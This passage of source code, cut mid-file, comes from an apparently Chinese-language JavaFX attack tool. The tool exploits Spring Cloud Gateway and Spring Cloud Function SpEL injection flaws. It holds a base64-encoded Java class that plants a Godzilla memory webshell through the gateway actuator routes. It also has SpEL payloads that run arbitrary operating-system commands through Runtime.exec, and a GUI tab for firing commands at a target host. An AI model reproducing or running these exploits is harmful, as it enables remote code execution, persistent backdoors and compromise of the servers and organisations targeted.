YW5jZQEAKShMamF2YS9sYW5nL1N0cmluZzspTGphdmF4L2NyeXB0by9DaXBoZXI7AQAIZ2V0Qnl0ZXMBAAQoKVtCAQAXKFtCTGphdmEvbGFuZy9TdHJpbmc7KVYBAARpbml0AQAXKElMamF2YS9zZWN1cml0eS9LZXk7KVYBAAdkb0ZpbmFsAQAGKFtCKVtCAQAbamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0AQAxKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0OwEABmxlbmd0aAEAAygpSQEABnVwZGF0ZQEAByhbQklJKVYBAAZkaWdlc3QBAAYoSVtCKVYBABUoSSlMamF2YS9sYW5nL1N0cmluZzsBAAt0b1VwcGVyQ2FzZQEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQAJZ2V0TWV0aG9kAQALbmV3SW5zdGFuY2UBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEAC2dldEZvcm1EYXRhAQAfKClMcmVhY3Rvci9jb3JlL3B1Ymxpc2hlci9Nb25vOwoBbQFuAQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsKABIBbwEABWFwcGx5AQAtKExtcy9HTWVtU2hlbGw7KUxqYXZhL3V0aWwvZnVuY3Rpb24vRnVuY3Rpb247AQAbcmVhY3Rvci9jb3JlL3B1Ymxpc2hlci9Nb25vAQAHZmxhdE1hcAEAPChMamF2YS91dGlsL2Z1bmN0aW9uL0Z1bmN0aW9uOylMcmVhY3Rvci9jb3JlL3B1Ymxpc2hlci9Nb25vOwEAI29yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9IdHRwU3RhdHVzAQACT0sBACVMb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL0h0dHBTdGF0dXM7AQA6KExqYXZhL2xhbmcvT2JqZWN0O0xvcmcvc3ByaW5nZnJhbWV3b3JrL2h0dHAvSHR0cFN0YXR1czspVgEACmdldE1lc3NhZ2UBACZvcmcvc3ByaW5nZnJhbWV3b3JrL3V0aWwvTXVsdGlWYWx1ZU1hcAEACGdldEZpcnN0AQANamF2YS91dGlsL01hcAEAA2dldAEAA3B1dAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAGZXF1YWxzAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQAJc3Vic3RyaW5nAQAWKElJKUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvQnl0ZUFycmF5AQAEanVzdAEAMShMamF2YS9sYW5nL09iamVjdDspTHJlYWN0b3IvY29yZS9wdWJsaXNoZXIvTW9ubzsHAXAMAXEBdAwAqACpAQAiamF2YS9sYW5nL2ludm9rZS9MYW1iZGFNZXRhZmFjdG9yeQEAC21ldGFmYWN0b3J5BwF2AQAGTG9va3VwAQDMKExqYXZhL2xhbmcvaW52b2tlL01ldGhvZEhhbmRsZXMkTG9va3VwO0xqYXZhL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvaW52b2tlL01ldGhvZFR5cGU7TGphdmEvbGFuZy9pbnZva2UvTWV0aG9kVHlwZTtMamF2YS9sYW5nL2ludm9rZS9NZXRob2RIYW5kbGU7TGphdmEvbGFuZy9pbnZva2UvTWV0aG9kVHlwZTspTGphdmEvbGFuZy9pbnZva2UvQ2FsbFNpdGU7BwF3AQAlamF2YS9sYW5nL2ludm9rZS9NZXRob2RIYW5kbGVzJExvb2t1cAEAHmphdmEvbGFuZy9pbnZva2UvTWV0aG9kSGFuZGxlcwAhABIADQAAAAQACQBhAGIAAQBjAAAAAgBkAAkAZQBmAAAACQBnAGYAAAAJAGgAZgAAAAoAAQBpAGoAAQBrAAAALwABAAEAAAAFKrcAAbEAAAACAGwAAAAGAAEAAAAWAG0AAAAMAAEAAAAFAG4AbwAAAAkAcABxAAIAawAAAUgABwAGAAAAkLsAAlm3AAOyAAS2AAWyAAa2AAW2AAe4AAizAAkqtgAKEgsGvQAMWQMSDVNZBBIOU1kFEg9TtgAQTi0EtgAREhISEwS9AAxZAxIUU7YAEDoEBL0AFVkDK1O4ABa5ABcBADoFLSoGvQANWQO7ABJZtwAYU1kEGQRTWQUZBVO2ABlXEhpNpwALTi22ABwSHU0ssAABAAAAgwCGABsAAwBsAAAAMgAMAAAAHQAcAB4AOQAfAD4AIABQACEAYgAiAIAAIwCD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'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping,'{}')}";
18 | payload = StrUtil.format(payload, path);
19 |
20 | // 自动去除url地址末尾的 / 符号
21 | host = host.endsWith("/") ? host.substring(0, host.length() - 1) : host;
22 | String result = request(host, payload);
23 |
24 | if (result.equals("false")) {
25 | return "漏洞利用失败!";
26 |
27 | }else {
28 | // String WebShell = host.replace("/actuator/gateway",path);
29 | String MemoryShell = host + path;
30 | HttpResponse res = HttpRequest.get(MemoryShell).execute();
31 | if (res.getStatus() == 200 && (res.body().contains("\"null\"") || res.body().contains("\"11CD6A8758984163WgXimIMHJH1vxWX/rcjUlw==6C37AC826A2A04BC\""))) {
32 | return "Success!\n哥斯拉默认配置(java_aes_base64):" + MemoryShell;
33 | }
34 | return "漏洞利用失败!";
35 | }
36 |
37 | }
38 |
39 | //执行命令
40 | public String rce (String host, String usercmd) {
41 |
42 | boolean cmdstatus = usercmd.contains(" ");
43 | if(cmdstatus){
44 | usercmd = usercmd.replace(" ","\\\",\\\"");
45 | }
46 |
47 | String payload = "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\\"{}\\\"}).getInputStream()))}";
48 | payload = StrUtil.format(payload,usercmd);
49 |
50 | // 自动去除url地址末尾的 / 符号
51 | host = host.endsWith("/") ? host.substring(0, host.length() - 1) : host;
52 | String result = request(host, payload);
53 |
54 | if (result.equals("false")) {
55 | return "漏洞利用失败!";
56 |
57 | }else {
58 | JSONObject jsonObject = JSONUtil.parseObj(result);
59 | result = String.valueOf(jsonObject.get("filters"));
60 | // result = StrUtil.sub(test, 32, -18);
61 | result = StrUtil.subBetween(result, "= \'", "\\n'");
62 |
63 | //去除\n及\t
64 | boolean status1 = result.contains("\\n");
65 | boolean status2 = result.contains("\\t");
66 | boolean status3 = result.contains("\\r");
67 |
68 | if(status1){
69 | result = result.replace("\\n","\n");
70 | }if (status2){
71 | result = result.replace("\\t","\t");
72 | }if (status3){
73 | result = result.replace("\\r","\r");
74 | }
75 | // System.out.println(result);
76 |
77 | return result;
78 |
79 | }
80 | }
81 |
82 | //请求方法
83 | public String request (String host, String payloads) {
84 | String random = MD5Generator.generateRandomMD5();
85 |
86 | //随机生成字符串
87 | // String ro = "qazwsxedcrfvtgbyhnujmikolp";
88 | // String random = RandomUtil.randomString(ro,5);
89 | // System.out.println(random);
90 |
91 | String url1 = host + "/actuator/gateway/routes/"+random;
92 | String url2 = host + "/actuator/gateway/refresh";
93 | String url3 = host + "/actuator/gateway/routes/"+random;
94 | String url4 = host + "/actuator/gateway/routes/"+random;
95 | String url5 = host + "/actuator/gateway/refresh";
96 |
97 | String payload = "{\n" +
98 | " \"id\": \"{}\",\n" +
99 | " \"filters\": [{\n" +
100 | " \"name\": \"AddResponseHeader\",\n" +
101 | " \"args\": {\"name\": \"Result\",\"value\": \"{}\"}\n" +
102 | "}],\n" +
103 | "\"uri\": \"http://example.com\",\n" +
104 | "\"order\": 0\n" +
105 | "}";
106 | payload = StrUtil.format(payload,random);
107 | payload = StrUtil.format(payload,payloads);
108 |
109 | String AcceptEncoding = "gzip, deflate";
110 | String Accept = "*/*";
111 | String AcceptLanguage = "en";
112 | String UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36";
113 | String ContentType = "application/json";
114 | String ContentType2 = "application/x-www-form-urlencoded";
115 |
116 | try{
117 | HttpRequest.post(url1)
118 | .header(Header.ACCEPT_ENCODING,AcceptEncoding)
119 | .header(Header.ACCEPT,Accept)
120 | .header(Header.ACCEPT_LANGUAGE,AcceptLanguage)
121 | .header(Header.USER_AGENT,UserAgent)
122 | .header(Header.CONTENT_TYPE,ContentType)
123 | .body(payload)
124 | .timeout(60000)//超时,毫秒
125 | .execute().body();
126 | HttpRequest.post(url2)
127 | .header(Header.USER_AGENT,UserAgent)
128 | .header(Header.CONTENT_TYPE,ContentType2)
129 | .timeout(60000)//超时,毫秒
130 | .execute().body();
131 | HttpResponse res = HttpRequest.get(url3)
132 | // .setHttpProxy("127.0.0.1",8888)
133 | .header(Header.USER_AGENT,UserAgent)
134 | .header(Header.CONTENT_TYPE,ContentType2)
135 | .timeout(60000)//超时,毫秒
136 | .execute();
137 | HttpRequest.delete(url4)
138 | .header(Header.USER_AGENT,UserAgent)
139 | .header(Header.CONTENT_TYPE,ContentType2)
140 | .timeout(60000)//超时,毫秒
141 | .execute().body();
142 | HttpRequest.post(url5)
143 | .header(Header.USER_AGENT,UserAgent)
144 | .header(Header.CONTENT_TYPE,ContentType2)
145 | .timeout(60000)//超时,毫秒
146 | .execute().body();
147 |
148 | if (String.valueOf(res.getStatus()).equals("200")&&res.body().contains(random)) {
149 | return res.body();
150 | }else {
151 | return "false";
152 | }
153 | } catch (Exception e) {
154 | return "false";
155 | }
156 |
157 | }
158 | }
159 |
160 |
161 |
--------------------------------------------------------------------------------
/src/main/java/org/example/VBoxContent.java:
--------------------------------------------------------------------------------
1 | package org.example;
2 |
3 | import javafx.geometry.Insets;
4 | import javafx.geometry.Pos;
5 | import javafx.scene.control.TabPane;
6 | import javafx.scene.layout.Priority;
7 | import javafx.scene.layout.VBox;
8 |
9 | public class VBoxContent extends VBox {
10 |
11 | public VBoxContent() {
12 | super(10);
13 |
14 | TabPane tabPane = new TabPane();
15 |
16 | //综合信息/检测日志Tab
17 | InfoTab infoTab = new InfoTab();
18 |
19 | CheckHBox checkHBox = new CheckHBox(infoTab);
20 | // 创建“漏洞利用”Tab
21 | VulnTab vulnTab = new VulnTab(checkHBox);
22 |
23 | // 创建“内存马”Tab
24 | MemoryShellTab memoryShellTab = new MemoryShellTab(checkHBox);
25 | tabPane.getTabs().addAll(infoTab, vulnTab, memoryShellTab);
26 |
27 | this.getChildren().addAll(checkHBox,tabPane);
28 | this.setAlignment(Pos.CENTER);
29 | this.setVgrow(tabPane, Priority.ALWAYS);
30 | this.setPadding(new Insets(5));
31 | }
32 | }
33 |
--------------------------------------------------------------------------------
/src/main/java/org/example/VulnTab.java:
--------------------------------------------------------------------------------
1 | package org.example;
2 |
3 | import javafx.concurrent.Task;
4 | import javafx.geometry.Insets;
5 | import javafx.geometry.Pos;
6 | import javafx.scene.control.*;
7 | import javafx.scene.layout.HBox;
8 | import javafx.scene.layout.Priority;
9 | import javafx.scene.layout.StackPane;
10 | import javafx.scene.layout.VBox;
11 | import org.example.Poc.*;
12 |
13 | public class VulnTab extends Tab {
14 | Gateway gateway = new Gateway();
15 | Function function = new Function();
16 | public VulnTab(CheckHBox checkHBox) {
17 | this.setText("命令执行");
18 |
19 | StackPane root = new StackPane();
20 | VBox vbox = new VBox(20);
21 | HBox hbox = new HBox(10);
22 | HBox hBox1 = new HBox(10);
23 |
24 | //第一行组件
25 | Label label = new Label("输入命令");
26 | TextField textField = new TextField("whoami");
27 | Button button = new Button("执行命令");
28 | button.setPrefWidth(100);
29 | hbox.getChildren().addAll(label,textField,button);
30 | hbox.setAlignment(Pos.CENTER);
31 | hbox.setHgrow(textField, Priority.ALWAYS);
32 |
33 | //第二行组件
34 | TextArea textArea =new TextArea();
35 | textArea.setWrapText(true);
36 | hBox1.getChildren().add(textArea);
37 | hBox1.setHgrow(textArea, Priority.ALWAYS);
38 |
39 | //执行命令按钮触发动作
40 | button.setOnAction(event -> {
41 | // 获取用户选择的漏洞类型
42 | String list = checkHBox.comboBox.getSelectionModel().getSelectedItem();
43 |
44 | // 创建一个异步任务
45 | Task task = new Task() {
46 | @Override
47 | protected String call() throws Exception {
48 | switch (list) {
49 | case "Spring Cloud Gateway 命令执行":
50 | return gateway.rce(checkHBox.textField.getText(),textField.getText());
51 | case "Spring Cloud Function SpEL 远程代码执行漏洞":
52 | return function.Command(checkHBox.textField.getText(),textField.getText(),null);
53 | default:
54 | // 如果漏洞类型不在已知列表中,则返回提示信息
55 | return "暂未实现!";
56 | }
57 | }
58 | };
59 |
60 | // 当异步任务完成时,将检测结果显示到 textArea 中
61 | task.setOnSucceeded(workerStateEvent -> textArea.setText(task.getValue()));
62 |
63 | // 创建一个新线程并启动异步任务
64 | Thread thread = new Thread(task);
65 | thread.setDaemon(true); // 将线程设置为守护线程
66 | thread.start();
67 | });
68 |
69 |
70 | vbox.getChildren().addAll(hbox,hBox1);
71 | vbox.setAlignment(Pos.CENTER);
72 | vbox.setVgrow(hBox1, Priority.ALWAYS);
73 | vbox.setPadding(new Insets(5));
74 | root.getChildren().addAll(vbox);
75 | this.setContent(root);
76 | }
77 | }
78 |
--------------------------------------------------------------------------------